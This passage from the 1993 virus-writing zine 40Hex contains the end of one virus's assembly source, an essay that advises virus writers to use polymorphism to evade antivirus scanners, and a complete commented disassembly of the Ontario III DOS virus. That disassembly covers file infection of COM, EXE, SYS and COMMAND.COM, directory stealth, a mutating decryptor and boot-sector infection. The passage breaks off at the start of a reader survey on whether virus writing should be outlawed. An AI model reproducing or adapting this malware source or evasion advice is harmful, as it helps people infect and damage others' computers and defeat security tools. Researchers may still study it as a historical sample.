end_write_virus:
finish_infect:
mov ax,5701h ; restore file time/date
mov cx,cs:filetime
mov dx,cs:filedate
pushf
call dword ptr cs:oldint21
inc cs:infcounter
cmp cs:infcounter,10d ; after 10 infections,
jne infectOK
call cs:restoreint21pointer ; turn off virus
jmp short infectOK
errorinfect:
stc ; set error flag
jmp short exitinfect
infectOK:
clc ; clear error flag
exitinfect:
pop bp
pop di
pop es
pop ds
pop dx
pop cx
retn
endinfect:
db 0
endvirus:
int 20h
carrierencrypt:
mov word ptr cs:encryptpointer,offset encrypt
retn
end start
-------------------------------------------------------------------------------
DA
40Hex Issue 10 Volume 3 Number 1 File 007
A Case Against Simple Encryption And For Polymorphism
~ ~~~~ ~~~~~~~ ~~~~~~ ~~~~~~~~~~ ~~~ ~~~ ~~~~~~~~~~~~
In a well-crafted virus, every line of code should serve a definite
purpose. No byte should be wasted. Is encryption, long used by virus
programmers, still a viable method of eluding scanners and, if not, is
encryption any longer a necessary part of a virus?
The type of encryption found in the typical virus is a simple XOR loop or
another similar type of operation, i.e. rotate, add, etc. The idea behind
encryption was to change the virus during each iteration so that scanners would
not be able to detect it. However, such simple encryption hardly serves this
job, as most scanners simply scan for a pattern found in the encryption. Only
a handful delve deeper than the decryption routine. So the sole purpose of
simple encryption such as that seen in most viruses nowadays seems to be to
hide text strings from archaic text searching programs (remember those virus
books that touted CHK4BOMB as the best thing since rotten Jello?). But is it
worth including encryption solely for this purpose? I think not. Few people
search files for unusual text strings and the extra code needed to encrypt a
file for this purpose may hardly be justified to overcome this obstacle.
As mentioned previously, waste should be frowned upon in viruses.
Unquestionably, the ultimate goal of a virus is to avoid detection while
spreading to the greatest number of hosts. It has been established that simple
decryption patterns do not aid a virus in avoiding detection from scanners.
And encryption is certainly not a vital part of the replication process. Thus
simple attempts at encryption do not add anything of value to the virus.
Yet these weak encryption routines _are occasionally_ necessary, but only
as stepping stones for fledgling virus programmers entering the realm of
polymorphism. Without a few simple encryption routines and knowledge of their
use under his belt, a virus programmer would be hard-pressed to create a truly
polymorphic virus. Therefore, it should be noted that simple encryption should
be used only as part of the learning process. However, remember also that such
encryption pales in the face of modern virus scanners and polymorphism is a far
better alternative.
Polymorphism is perhaps the best technique modern viruses use to avoid
scanners. The other alternative, stealth techniques, is limited in utility and
is rendered helpless in the face of simple memory scans. A combination of the
two is desirable, yet it is not always possible to implement both in a virus of
limited size. So let us examine polymorphism.
Polymorphism, in its simplest form, merely consists of a fixed-length
decryptor with a few bytes which may be altered during each infection. This is
merely a small step up from the simple encryption routine. A few extra XOR
statements in the code are all that is necessary for implementing such a
routine. However, this is, once again, only a small step up; most such fixed-
length decryptors may be detected by a couple scan strings with wildcards.
More powerful polymorphism is necessary for evasion of scanners.
The MtE and the recently introduced TPE are both powerful products which
allow every virus to include polymorphism. However, it is important to note
that viruses utilising such products may be detected by existing scanners.
Therefore, it is desirable to write a new polymorphic routine from scratch.
This will allow for longer survival of the virus.
The chief problem with good polymorphism is that the virus should be able
to detect existing infections of itself in files. Otherwise, the virus could
grow beyond limit and much disk space would be taken up in redundant
infections. Two methods are commonly used; the infection marker byte and the
time stamp. However, such a check is inherently limiting as the virus scanner
is then able to use said check to its advantage; it need not check files, for
example, save those which have the seconds field set to eight. Then again, a
scanner which functions in this manner would be helpless in detecting another
virus utilising the identical polymorphic routine but with a different
infection stamp.
The second major difficulty with good polymorphic routines is simply the
size. MtE, for example, adds over 2,000 bytes of code. A working, albeit
limited, polymorphic routine is possible in half this size, yet it would still
be 1,000 bytes, a size larger than most viruses. Increased size, of course,
increases the disk access time. While generally irrelevant in a harddisk-based
environment, this increased infection time becomes crucial when infecting files
on floppy diskettes. There are precious few ways of alleviating this problem;
the only real solution is to decrease the functionality of the polymorphic
routine and thereby compromise its worth.
Taken as a whole, the advantages in utilising polymorphic routines should
outweigh the disadvantages. The increased difficulty of scanning may allow the
virus to slip through the cracks even after a virus scanner claims to detect it
reliably. Take, for example, MtE. To this day, many virus scanners fail to
accurately report MtE infections; some still trigger false positives. To
reiterate a previous point - simple decryption routines are worthless, as they
fail to serve their main purpose of aiding in the evasion of scanners. Even
simple polymorphic routines are easily defeated by scanners; true polymorphism
or no encryption at all are only alternatives.
Dark Angel
Phalcon/Skism 1993
40Hex Issue 10 Volume 3 Number 1 File 008
The Ontario III virus was written by one of our YAM friends up in
Canada, Death Angel. The virus infects COM/EXE files. Additionally, it
attaches to SYS files yet does not truly infect them. When the virus is
executed from a SYS file, it goes resident yet it never alters the interrupt
vectors. Therefore, it is merely taking up space in memory. The virus
automatically attacks COMSPEC upon receiving control, whether it is in a COM,
EXE, or SYS host file. However, I suspect that the virus will have trouble
dealing with command interpreters apart from COMMAND.COM, as it makes certain
assumptions, i.e. the end of the file is filled with null characters. The
virus utilises a simple polymorphic routine, although the decryptor is of a
fixed length. The polymorphism is therefore of questionable utility.
Additionally, the boot sector is pointless as it is never accessed. There are
a few additional bugs in the virus which detract from its overall quality.
-------------------------------------------------------------------------------
.model tiny
.code
; Ontario III
; Disassembly by Dark Angel of Phalcon/Skism
; Assemble with TASM /m ONTARIO3.ASM
; Virus written by Death Angel of YAM
org 0
decrypt:
patch1:
mov di,offset endvirus ; usually: offset enddecrypt
patch2 = $ - 2
patch3 = $
mov cx,37E5h
patch4 = $ - 2
patch5:
db 82h, 0C5h, 0D0h ; add ch,0D0h
patch6 = $ - 1
patch7:
mov al,0Ah
patch8 = $ - 1
decrypt_loop:
add cs:[di],al
patch9 = $ - 1
patch10:
ror al,cl
patch11 = $ - 1
patch12:
inc di
patch13:
loop decrypt_loop
enddecrypt:
patch14:
db 89h, 0FBh ; mov bx,di
patch15 = $ - 1
sub bx,offset save4
xchg ax,cx
dec ax
cld
call saveorigvectors
db 0e9h ; jmp
SYSpatch dw 0 ; currently jmp to next line
int 21h ; installation check
or al,ah
jz restorefile
push ds
mov cx,bx
mov di,ds ; save current ds
mov ah,13h ; get BIOS int 13h handler
int 2Fh ; to ds:dx and es:bx
mov si,ds ; does function function?
cmp si,di
je skipit
push ds
push dx
mov ah,13h ; restore handler
int 2Fh
mov bx,cx ; but save its address too
pop word ptr cs:[bx+storeint13_1]
pop word ptr cs:[bx+storeint13_2]
skipit:
xor di,di
mov cx,es
dec cx
mov ds,cx ; get MCB of current program
sub word ptr [di+3],140h ; decrease size by 5K
mov ax,[di+12h] ; get high memory from PSP
sub ax,140h ; decrease size by 5K
mov [di+12h],ax ; replace it
mov es,ax ; es->high memory segment
sub ax,1000h
mov word ptr cs:[bx+patchsegment],ax
push cs
pop ds
mov si,bx
mov cx,offset save4
rep movsb
mov ds,cx
cli
mov word ptr ds:21h*4,offset int21 ; set int 21h handler
mov ds:21h*4+2,es ; to virus's
sti
mov ax,4BFFh ; infect COMSPEC
push bx
int 21h
pop bx
pop ds
push ds
pop es
restorefile:
lea si,[bx+offset save4]
mov di,100h
cmp bx,di
jb restoreEXE
push di
movsw
movsw
retn
restoreEXE:
mov ax,es ; get start segment
add ax,10h ; adjust for PSP
add cs:[si+2],ax ; relocate CS
add cs:[si+4],ax ; relocate SS
cli
mov sp,cs:[si+6] ; restore stack
mov ss,cs:[si+4]
sti
jmp dword ptr cs:[si]
int21instcheck:
inc ax
iret
int21:
cmp ax,0FFFFh ; installation check?
je int21instcheck
cmp ah,4Bh ; execute?
je execute
cmp ah,11h ; FCB find first?
je findfirstnext
cmp ah,12h ; FCB find next?
je findfirstnext
cmp ax,3D00h ; open file read only?
jne int21exit
call handleopen
int21exit:
db 0EAh ; jmp far ptr
oldint21 dd 0
findfirstnext: ; standard stealth routine
push bp
mov bp,sp
cmp word ptr [bp+4],1234h
patchsegment = $ - 2
pop bp
jb int21exit
call callint21 ; do findfirst/next
call pushall
mov ah,2Fh ; Get DTA
call callint21
cmp byte ptr es:[bx],0FFh ; extended FCB?
je findfirstnextnotextendedFCB
sub bx,7 ; convert to standard
findfirstnextnotextendedFCB:
mov al,es:[bx+1Eh] ; get seconds counter
and al,1Fh ; check if 62 seconds
cmp al,1Fh ; (infection marker)
jne findfirstnextexit ; exit if not
mov dx,es:[bx+26h] ; get file size
mov ax,es:[bx+24h]
sub ax,viruslength ; decrease by virus
sbb dx,0 ; size
or dx,dx
jc findfirstnextexit
mov es:[bx+26h],dx ; replace file size
mov es:[bx+24h],ax ; with "stealthed" one
findfirstnextexit:
call popall
iret
execute:
mov byte ptr cs:infectSYS,0
cmp al,1 ; load/don't execute
je load_noexecute
cmp al,0FFh ; called by virus
je infectCOMSPEC
call infectDSDX
jmp short int21exit
infectCOMMANDCOM:
mov byte ptr cs:infectSYS,0
push dx
push ds
mov dx,offset command_com
push cs
pop ds
mov byte ptr ds:infCOMMAND,0FFh ; infecting COMMAND.COM
call infectDSDX
pop ds
pop dx
iret
infectCOMSPEC:
mov ah,51h ; Get current PSP
call callint21
mov es,bx
mov ds,es:[2Ch] ; environment block
xor si,si
push cs
pop es
infectCOMSPECfindcomspec:
mov di,offset comspec ; is 'COMSPEC=' the first
mov cx,4 ; entry in environment?
repe cmpsw ; (should be)
jcxz infectCOMSPECnoenvironment ; otherwise, quit
infectCOMSPECfindend:
lodsb ; search for end of string
or al,al
jnz infectCOMSPECfindend
cmp byte ptr [si],0 ; found it?
jne infectCOMSPECfindcomspec; nope, try again
jmp short infectCOMMANDCOM ; otherwise, infect
infectCOMSPECnoenvironment:
mov dx,si
mov byte ptr cs:infCOMMAND,0FFh ; infecting COMMAND.COM
call infectDSDX ; but are we really? Maybe
iret ; it's 4DOS. This is a bug.
load_noexecute:
push es ; save parameter block
push bx
call callint21 ; prechain
pop bx
pop es
call pushall
jnc load_noexecute_ok ; continue if no error
jmp load_noexecute_exit
load_noexecute_ok:
xor cx,cx
lds si,dword ptr es:[bx+12h]; get entry point on return
push ds
push si
mov di,100h
cmp si,di
jl loading_EXE
ja load_noexecute_quit
; debugger active
lodsb
cmp al,0E9h ; check if infected
jne load_noexecute_quit
lodsw
push ax ; save jmp location
lodsb
cmp al,'O' ; check for infection marker
pop si ; get jmp location
jnz load_noexecute_quit
add si,103h ; convert to file offset
inc cx
inc cx
pop ax
push si
push ds
pop es
jmp short check_infection
loading_EXE:
lea di,[bx+0Eh] ; check SS:SP on return
cmp word ptr es:[di],9FFh ; infected?
jne load_noexecute_quit
check_infection:
lodsb
cmp al,0BBh ; possibility 1
je infected_checked1
cmp al,0BEh ; possibility 2
je infected_checked1
cmp al,0BFh ; possibility 3
jne load_noexecute_quit
infected_checked1:
lodsw ; get starting offset
push ax ; to decrypt
lodsb ; get next byte
cmp al,0B9h ; check for infection
lodsw
pop si ; offset to decrypt
jnz load_noexecute_quit
cmp ah,7 ; check if infected
je infected_checked2
cmp al,0E5h ; ditto
jne load_noexecute_quit
infected_checked2:
add si,save4 - enddecrypt
jcxz disinfectEXE
rep movsw
jmp short finish_disinfection
disinfectEXE:
mov ah,51h ; Get current PSP
call callint21
add bx,10h ; go to file starting CS
mov ax,[si+6]
dec ax
dec ax
stosw
mov ax,[si+4]
add ax,bx
stosw
movsw
lodsw
add ax,bx
stosw
finish_disinfection:
pop di
pop es
xchg ax,cx
mov cx,viruslength
rep stosb
jmp short load_noexecute_exit
load_noexecute_quit:
pop ax
pop ax
load_noexecute_exit:
call popall
retf 2
handleopen:
call pushall
mov si,dx ; find extension of
handleopenscanloop: ; ASCIIZ string
lodsb
or al,al ; found end of screen?
jz handleopenexit ; yup, no extension -- exit
cmp al,'.' ; extension found?
jne handleopenscanloop
mov di,offset validextensions - 3
push cs
pop es
mov cx,4
nop
scanvalidextension:
push cx
push si
mov cl,3
add di,cx
push di
check_extension:
lodsb
and al,5Fh ; Capitalise
cmp al,es:[di] ; do they compare ok?
jne extension_no_match ; nope, try next one
inc di
loop check_extension
cmp al,'S' ; SYS file?
jne opennotSYS
mov byte ptr cs:infectSYS,0FFh ; infecting SYS file
opennotSYS:
call infectDSDX
add sp,6
jmp short handleopenexit
extension_no_match:
pop di
pop si
pop cx
loop scanvalidextension
handleopenexit:
call popall
retn
infectDSDX:
call pushall
call replaceint13and24
push dx
push ds
mov ax,4300h ; get attributes
call callint21
push cx
pushf
jc go_restoreattribs
push cx
and cl,1 ; check if read only
cmp cl,1
jne infectDSDXnoclearattributes
xor cx,cx ; clear if so
mov ax,4301h
call callint21
infectDSDXnoclearattributes:
pop cx
and cl,4
cmp cl,4
je go_restoreattribs
mov ax,3D02h ; open file read/write
call callint21
jnc infectDSDXopenOK ; continue if no error
go_restoreattribs:
jmp infectDSDXrestoreattributes
infectDSDXopenOK:
xchg ax,bx ; handle to bx
push cs
push cs
pop ds
pop es
mov word ptr ds:SYSpatch,0
mov ax,5700h ; save file time/date
call callint21
push dx
push cx
and cl,1Fh ; check if infected
cmp cl,1Fh ; (seconds == 62)
je infectDSDXerror
mov dx,offset readbuffer ; read header from
mov cx,1Ch ; potential carrier
mov ah,3Fh ; file to the
call callint21 ; buffer
jnc infectDSDXreadOK ; continue if no error
infectDSDXerror:
stc ; mark error
jmp infectDSDXclose ; and exit
infectDSDXreadOK:
cmp ax,cx ; read 1ch bytes?
jne infectDSDXerror ; exit if not
xor dx,dx
mov cx,dx
mov ax,4202h ; go to end of file
call callint21
or dx,dx
jnz infectDSDXfilelargeenough
cmp ax,0A01h ; check if too small
jb infectDSDXerror
infectDSDXfilelargeenough:
cmp dl,5
ja infectDSDXerror
cmp word ptr ds:readbuffer,'ZM' ; EXE?
je infectDSDXskipcheck
cmp word ptr ds:readbuffer,'MZ' ; EXE?
infectDSDXskipcheck:
je infectDSDXcheckEXE
cmp byte ptr ds:infectSYS,0FFh ; infecting SYS file?
jne infectDSDXcheckCOM
cmp word ptr ds:readbuffer,0FFFFh ; check if SYS
jne infectDSDXerror ; file
cmp word ptr ds:readbuffer+2,0FFFFh
isanoverlay:
jne infectDSDXerror
or dx,dx
jnz infectDSDXerror
push ax ; save file size
mov di,offset save4
mov ax,5657h ; push di, push si
stosw
mov ax,0E953h ; push bx, jmp decrypt
stosw
mov ax,offset decrypt - (offset save4 + 6)
stosw
mov ax,word ptr ds:readbuffer+6 ; get strategy start point
stosw
pop ax ; get file size
push ax
add ax,offset save4
mov word ptr ds:readbuffer+6,ax
mov word ptr ds:SYSpatch,offset strategy-(offset SYSpatch + 2)
mov byte ptr ds:decrypt_loop,36h ; replace with SS:
pop ax
add ax,offset enddecrypt
jmp short go_infectDSDXcontinue
infectDSDXcheckCOM:
cmp byte ptr ds:readbuffer+3,'O'; check if already infected
jmp_infectDSDXerror:
je infectDSDXerror
cmp byte ptr ds:infCOMMAND,0; infecting COMMAND.COM?
je dontdoslackspace
sub ax,viruslength ; infect slack space of
xchg ax,dx ; command.com
xor cx,cx
mov ax,4200h
call callint21
dontdoslackspace:
mov si,offset readbuffer
mov di,offset save4
movsw
movsw
sub ax,3 ; convert size->jmp dest
mov byte ptr ds:readbuffer,0E9h ; encode JMP
mov word ptr ds:readbuffer+1,ax ; and destination
mov byte ptr ds:readbuffer+3,'O' ; mark infected
add ax,116h
go_infectDSDXcontinue:
jmp short infectDSDXcontinue
infectDSDXcheckEXE:
cmp word ptr ds:readbuffer+10h,0A01h ; already infected?
je jmp_infectDSDXerror
cmp word ptr ds:readbuffer+1Ah,0
jne isanoverlay ; exit if it's an overlay
push dx
push ax
mov cl,4
ror dx,cl
shr ax,cl
add ax,dx ; ax:dx = file size
sub ax,word ptr ds:readbuffer+8 ; subtract header size
mov si,offset readbuffer+14h
mov di,offset origCSIP
movsw ; save initial CS:IP
movsw
mov si,offset readbuffer+0Eh
movsw ; save initial SS:SP
movsw
mov word ptr ds:readbuffer+16h,ax ; set initial CS
mov word ptr ds:readbuffer+0Eh,ax ; set initial SS
mov word ptr ds:readbuffer+10h,0A01h ; set initial SP
pop ax
pop dx
push ax
add ax,0A01h
; adc dx,0 works just as well
jnc infectEXEnocarry
inc dx
infectEXEnocarry:
mov cx,200h ; take image size
div cx
; The next line is not entirely corrrect. The image size
; div 512 is rounded up. Therefore, DOS will find this number
; to be off by 512d bytes
mov word ptr ds:readbuffer+4,ax ; image size div 512
mov word ptr ds:readbuffer+2,dx ; image size mod 512
pop ax
and ax,0Fh
mov word ptr ds:readbuffer+14h,ax ; set initial IP
add ax,offset enddecrypt
infectDSDXcontinue:
mov word ptr ds:patch2,ax ; patch start area
push bx ; save file handle
xor byte ptr ds:decrypt_loop,18h ; swap SS: & CS:
call encrypt ; encrypt virus to buffer
pop bx ; restore file handle
mov ah,40h ; Concatenate encrypted
call callint21 ; virus
jc infectDSDXclose ; exit on error
xor dx,dx
mov cx,dx
mov ax,4200h ; go to start of file
call callint21
jc infectDSDXclose
mov dx,offset readbuffer
mov cx,1Ch
mov ah,40h ; Write new header
call callint21
infectDSDXclose:
pop cx
pop dx
jc infectDSDXnoaltertime
cmp byte ptr ds:infCOMMAND,0FFh ; infecting COMMAND.COM?
je infectDSDXnoaltertime
or cl,1Fh ; set time to 62 seconds
infectDSDXnoaltertime:
mov ax,5701h ; restore file time/date
call callint21
mov ah,3Eh ; Close file
call callint21
infectDSDXrestoreattributes:
mov byte ptr cs:infCOMMAND,0
mov byte ptr cs:infectSYS,0
popf
pop cx
pop ds
pop dx
jc infectDSDXexit
mov ax,4301h ; restore file attributes
call callint21
infectDSDXexit:
call restoreint13and24
call popall
retn
pushall:
push bp
mov bp,sp
push bx
push cx
push dx
push si
push di
push ds
push es
pushf
xchg ax,[bp+2]
push ax
mov ax,[bp+2]
retn
popall:
pop ax
xchg ax,[bp+2]
popf
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop bp
retn
replaceint13and24:
push ds
xor ax,ax
mov ds,ax
mov si,13h*4
lodsw
mov word ptr cs:origint13_1,ax
lodsw
mov word ptr cs:origint13_2,ax
mov si,24h*4
lodsw
mov word ptr cs:origint24_1,ax
lodsw
mov word ptr cs:origint24_2,ax
mov word ptr ds:13h*4,1234h
storeint13_1 = $ - 2
mov word ptr ds:13h*4+2,1234h
storeint13_2 = $ - 2
mov word ptr ds:24h*4,offset int24 ; replace int 24 handler
mov ds:24h*4+2,cs
pop ds
retn
restoreint13and24:
xor ax,ax
mov ds,ax
mov word ptr ds:13h*4,1234h
origint13_1 = $ - 2
mov word ptr ds:13h*4+2,1234h
origint13_2 = $ - 2
mov word ptr ds:24h*4,1234h
origint24_1 = $ - 2
mov word ptr ds:24h*4+2,1234h
origint24_2 = $ - 2
retn
int24:
xor al,al
iret
encrypt:
mov di,offset patch4
mov si,di
mov word ptr [si],offset save4 - offset enddecrypt
xor bx,bx
call random
jz encrypt1
add bl,4
inc di
encrypt1:
call random
in al,40h ; get random #
mov bh,al
jz encrypt2
add [di],al ; alter amount to encrypt
add bl,28h
jmp short encrypt3
encrypt2:
sub [di],al ; alter amount to encrypt
encrypt3:
add bl,0C1h
mov [si+3],bx
call random
jz encrypt4
xor byte ptr [si+2],2 ; flip betwen add/sub
encrypt4:
in ax,40h ; get random number != 0
or ax,ax
jz encrypt4
mov bx,3 ; first choose one of
xor dx,dx ; three possible registers
div bx
xchg ax,bx
inc ax ; ax = 4
mul dx ; convert to offset in
xchg ax,bx ; table
lea si,[bx+offset table1]
lodsb
mov byte ptr ds:patch1,al
lodsb
mov byte ptr ds:patch9,al
lodsb
mov byte ptr ds:patch12,al
lodsb
mov byte ptr ds:patch15,al
call random
jz encrypt5
xor byte ptr ds:patch13,2 ; loop/loopnz
encrypt5:
in ax,40h ; get random number
mov byte ptr ds:patch8,ah
and ax,0Fh
xchg ax,bx
shl bx,1
mov ax,[bx+offset table2]
mov word ptr ds:patch10,ax
xor si,si
mov di,offset encryptbuffer ; copy virus to
mov cx,endvirus - decrypt ; temporary buffer
push cx ; for encryption
cld
rep movsb
mov bx,offset enddecrypt
push word ptr [bx] ; save it
mov byte ptr [bx],0C3h ; put retn in its place
push bx
xor byte ptr [bx-7],28h ; sub/add
push word ptr ds:decrypt_loop
mov byte ptr [bx-8],2Eh ; CS:
mov dx,offset encryptbuffer
add bx,dx
mov word ptr ds:patch2,bx
call decrypt
pop word ptr ds:decrypt_loop
pop bx
pop word ptr [bx]
pop cx
retn
random: ; 1/2 chance of zero flag set
in al,40h
and al,1
cmp al,1
retn
saveorigvectors:
push ds
push ax
xor ax,ax
mov ds,ax
mov ax,ds:13h*4
mov word ptr cs:[bx+storeint13_1],ax
mov ax,ds:13h*4+2
mov word ptr cs:[bx+storeint13_2],ax
mov ax,ds:21h*4
mov word ptr cs:[bx+offset oldint21],ax
mov ax,ds:21h*4+2
mov word ptr cs:[bx+offset oldint21+2],ax
pop ax
pop ds
retn
strategy:
mov word ptr cs:[bx+doffset],bx ; save delta offset
pop bx
pop di
pop si
call pushall
push cs
pop ds
mov bx,1234h ; restore delta offset
doffset = $ - 2
db 8bh, 87h ; mov ax,ds:[save4+6]
dw offset save4 + 6 ; get old strategy entry point
mov word ptr ds:[6],ax ; and restore to file header
int 12h ; Get memory size in K
sub ax,5 ; decrease by 5 K
mov cl,6 ; convert to paragraphs
shl ax,cl
mov es,ax
mov word ptr ds:[bx+himemsegment],ax
cmp byte ptr es:[3],0B9h ; check if already installed
je strategyexit
mov si,bx ; copy to high memory
xor di,di
mov cx,viruslength
rep movsb
pushf
db 09Ah ; call far ptr
dw infectCOMMANDCOM
himemsegment dw 0
strategyexit:
call popall
jmp word ptr cs:[6] ; go to original strategy
table1 db 0BEh, 04h, 46h,0F3h ; si
db 0BFh, 05h, 47h,0FBh ; di
db 0BBh, 07h, 43h,0DBh ; bx
table2: inc al
dec al
inc ax
inc ax
dec ax
dec ax
add al,cl
sub al,cl
xor al,cl
xor al,ch
not al
neg al
ror al,1
rol al,1
ror al,cl
rol al,cl
nop
nop
add al,ch
comspec db 'COMSPEC='
command_com db '\COMMAND.COM',0
validextensions db 'COMEXEOVLSYS'
bootsector: ; offset 600h in the virus
jmp short bootsectorentry
nop
bootparms db 3Bh dup (0)
bootsectorentry:
xor ax,ax
mov ds,ax
cli
mov ss,ax
mov sp,7C00h
sti
mov ax,ds:13h*4 ; get int 13h handler
mov word ptr ds:[7C00h+oldint13-bootsector],ax
mov ax,ds:13h*4+2 ; and save it
mov word ptr ds:[7C00h+oldint13+2-bootsector],ax
mov ax,ds:[413h] ; get total memory
sub ax,2 ; reduce by 2K
mov ds:[413h],ax ; replace memory size
mov cl,6
shl ax,cl ; convert to paragraphs
sub ax,60h ; go to boot block start
mov es,ax
mov si,sp
mov di,offset bootsector
mov cx,100h
rep movsw
mov dx,offset highentry
push es
push dx
retf
highentry:
xor ax,ax ; reset disk
and dl,al
int 13h
push ds
push es
pop ds
pop es
mov bx,sp ; read to 0:7C00h
mov dx,drivehead ; find where original boot
mov cx,sectortrack ; block stored and then
mov ax,201h ; read original boot
int 13h ; sector
jc $ ; halt on error
xor ax,ax ; else chain to original
mov ds,ax ; boot sector
mov word ptr ds:13h*4,offset int13
mov ds:13h*4+2,cs ; replace int 13h handler
push es
push bx
retf
int13:
push bp
mov bp,sp
push ds
push es
push si
push di
push dx
push cx
push bx
push ax
pushf
xor bx,bx
mov ds,bx
test byte ptr ds:[43Fh],1 ; A: spinning?
jnz exitint13 ; exit if so
or dl,dl ; default drive?
jnz exitint13 ; exit if not
cmp ah,2 ; read/write/verify?
jb exitint13
cmp ah,4
jbe trapint13
exitint13:
popf
pop ax
pop bx
pop cx
pop dx
pop di
pop si
pop es
pop ds
pop bp
jmp dword ptr cs:oldint13 ; chain to original handler
trapint13:
cld
push cs
push cs
pop es
pop ds
xor cx,cx
mov dx,cx
inc cx
mov bx,offset endvirus ; read boot block to
mov ax,201h ; buffer at endvirus
call callint13
jnc int13readOK
int13exit:
jmp short exitint13
int13readOK:
cmp word ptr [bx+15h],501Eh ; push ds, push ax?
jne int13skip
cmp word ptr [bx+35h],0FF2Eh; jmp cs: ?
jne int13skip
cmp word ptr [bx+70h],7505h ; add ax,XX75 ?
jne int13skip
mov dh,1
mov cl,3
mov ax,201h
call callint13
xor dh,dh
mov cl,1
mov ax,301h
call callint13
int13skip:
cmp word ptr ds:[offset endvirus-bootsector+YAM],'Y*'
je int13exit ; don't infect self
cmp word ptr ds:[offset endvirus+0Bh],200h
jne int13exit ; infect only 512 bytes per sector
cmp byte ptr ds:[offset endvirus+0Dh],2
jne int13exit ; only 2 reserved sectors
cmp word ptr ds:[offset endvirus+1Ah],2
ja int13exit ; only 2 sec/track
xor dx,dx ; calculate new location of boot block
mov ax,word ptr ds:[offset endvirus+13h] ; total sec
mov bx,word ptr ds:[offset endvirus+1Ah] ; sec/track
mov cx,bx
div bx ; # track
xor dx,dx
mov bx,word ptr ds:[offset endvirus+18h] ; sec/FAT
div bx
sub word ptr ds:[offset endvirus+13h],cx ; total sec
dec ax
mov byte ptr sectortrack+1,al
mov ax,word ptr ds:[offset endvirus+18h] ; sec/FAT
mov byte ptr sectortrack,al
mov ax,word ptr ds:[offset endvirus+1Ah] ; sec/track
dec ax
mov byte ptr drivehead+1,al
mov byte ptr drivehead,0
mov dx,drivehead ; move original boot block
mov cx,sectortrack ; to end of disk
mov bx,offset endvirus
mov ax,301h
call callint13
jc go_exitint13
mov si,offset endvirus+3 ; copy parameters so
mov di,offset bootparms ; no one notices boot
mov cx,bootsectorentry - bootparms ; block is changed
rep movsb
xor cx,cx
mov dx,cx
inc cx
mov bx,offset bootsector ; copy virus boot block
mov ax,301h
call callint13
go_exitint13:
jmp exitint13
callint21:
pushf
call dword ptr cs:oldint21
retn
callint13:
pushf
call dword ptr cs:oldint13
retn
oldint13 dd 0
drivehead dw 100h
sectortrack dw 2709h
YAM db '*YAM*',1Ah
db 'Your PC has a bootache! - Get some medicine!',1Ah
db 'Ontario-3 by Death Angel',1Ah,1Ah,1Ah,1Ah
save4:
origCSIP db 0CDh, 020h, 0, 0
origSSSP dd 0
endvirus:
viruslength = $ - decrypt
infCOMMAND db ?
infectSYS db ?
readbuffer db 01Ch dup (?)
encryptbuffer db viruslength dup (?)
end decrypt
-------------------------------------------------------------------------------
DA
40Hex Issue 10 Volume 3 Number 1 File 009
40-hex Survey:
Should Writing a Virus Be Outlawed?
by DecimatoR
Recently, while conversing with Garbageheap, I was inspired with the
idea for this article. So, with the help of a lot of people in the UseNet
alt.security and comp.virus newsgroups, I have determined what seems to be
the answer to my question. My thanks to all who responded - couldn't have
done it without ya!
I posted this message in alt.security and comp.virus:
"Greetings....
Some of you may read the infamous 40-Hex Virus magazine, published
by us. If so, we'd like your opinions for a survery we're doing.
The results of this survey will be published in 40-hex #10.
Here are the survey questions. Please answer them, and respond via
email to me. You may respond with simple Yes or No answers, or you
may be as wordy as you want. Please note - ANY response given might
be published in 40-hex magazine. Now, the questions:
1) Should it be Federally illegal to write a computer virus?
2) Should it be Federally illegal to distribute computer viruses,
to KNOWING individuals (ie on "virus" boards)? (This does NOT
mean infecting another person with a virus - it means giving
them a copy of a virus, and making sure they KNOW it is a virus)
3) If executable virus code is illegal, then should the SOURCE code
to the viruses be illegal to copy, sell, or other wise distribute?
Please mail me with YOUR opinions to the above, and feel free to
explain your views, or present other opinions you may have. We are
attempting to get a general idea as to the thoughts of people,
therefore we are posting this to COMP.VIRUS, and ALT.SECURITY, and
any other appropriate newsgroups.
Please note - we are NOT interested in the legallity of SPREADING
virus code by infection - that IS already illegal. We are also not
interested in the ethic issues of viruses. We want your opinions as
to what should be OUTLAWED, and what should be LEGAL. Of course, any
other opinions you may wish to add are welcome.
Thanks for your time and consideration..
--DecimatoR
Phalcon/Skism
40-Hex Magazine Columnist"
Amazingly, almost all of the responses stated that NO, it _SHOULD_NOT_ be
illegal to write, or distribute (to knowing persons) a computer virus. Many
respondees regarded that as censorship, and wanted nothing of the sort.
However, there were a few replies which, while not condoning the outlawing of
virus creation, also certainly did not condone the authoring or distributing
of viruses. There was one man, from England, though, who firmly stated that
there should be international laws banning the creation of, distribution of,
and sharing of virus source code. The fact that only one person responded in
this manner surprised me. I expected more.
Here are a few quotes from the responses I got. There are no names or
addresses attatched in most cases. I posted my original survey question
through an anonymous mailer, since I wasn't too sure of the response I'd get,
and in turn, the responses were also anonymous.